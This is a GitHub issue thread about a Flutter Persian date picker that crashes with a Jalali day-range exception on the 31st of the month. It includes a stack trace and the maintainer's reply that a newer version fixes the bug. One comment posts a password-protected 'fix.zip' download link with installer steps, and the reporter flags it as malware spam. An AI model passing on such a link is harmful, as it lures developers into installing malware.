### ISSUE TITLE
خطا در 31 هر ماه

### ISSUE THREAD

**Issue by reza-najafi1998** [M-amir-M/persian-datetime-picker#86]
======== Exception caught by widgets library =======================================================
The following _DateExceptionImpl was thrown building _CupertinoDatePickerDateTime(dirty, dependencies: [Directionality, MediaQuery, _InheritedCupertinoTheme], state: _CupertinoDatePickerDateTimeState#e517b):
DateException: Jalali day is out of valid range1.

The relevant error-causing widget was: 
  PCupertinoDatePicker PCupertinoDatePicker:file:///D:/project/flutter/payment/payment/lib/screens/addReminder.dart:93:28
When the exception was thrown, this was the stack: 
#0      new Jalali (package:persian_datetime_picker/src/date/src/jalali/jalali_date.dart:151:9)
#1      Jalali.add (package:persian_datetime_picker/src/date/src/jalali/jalali_date.dart:458:14)
#2      _CupertinoDatePickerDateTimeState._isValidHour (package:persian_datetime_picker/src/cupertino/cupertino_date_picker.dart:1394:40)
#3      _CupertinoDatePickerDateTimeState._buildHourPicker.<anonymous closure> (package:persian_datetime_picker/src/cupertino/cupertino_date_picker.dart:1463:30)
#4      new _GrowableList.generate (dart:core-patch/growable_array.dart:136:28)
#5      _CupertinoDatePickerDateTimeState._buildHourPicker (package:persian_datetime_picker/src/cupertino/cupertino_date_picker.dart:1449:19)
#6      _CupertinoDatePickerDateTimeState.build (package:persian_datetime_picker/src/cupertino/cupertino_date_picker.dart:1684:33)
#7      StatefulElement.build (package:flutter/src/widgets/framework.dart:5599:27)
#8      ComponentElement.performRebuild (package:flutter/src/widgets/framework.dart:5487:15)
#9      StatefulElement.performRebuild (package:flutter/src/widgets/framework.dart:5650:11)
#10     Element.rebuild (package:flutter/src/widgets/framework.dart:5203:7)
#11     BuildOwner.buildScope (package:flutter/src/widgets/framework.dart:2905:19)
#12     WidgetsBinding.drawFrame (package:flutter/src/widgets/binding.dart:1136:21)
#13     RendererBinding._handlePersistentFrameCallback (package:flutter/src/rendering/binding.dart:443:5)
#14     SchedulerBinding._invokeFrameCallback (package:flutter/src/scheduler/binding.dart:1392:15)
#15     SchedulerBinding.handleDrawFrame (package:flutter/src/scheduler/binding.dart:1313:9)
#16     SchedulerBinding._handleDrawFrame (package:flutter/src/scheduler/binding.dart:1171:5)
#17     _invoke (dart:ui/hooks.dart:312:13)
#18     PlatformDispatcher._drawFrame (dart:ui/platform_dispatcher.dart:419:5)
#19     _drawFrame (dart:ui/hooks.dart:283:31)

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by reza-najafi1998** [comment]
کسی این ور دانلود نکنه ، بد افزاره 
طرف همینطوری داره این لینکو پخش میکنه

**Comment by M-amir-M** [comment]
درود 
متوجه مسیج دوم شما نشدم
ولی این مشکل در نسخه جدید برطرف شده
موفق باشید
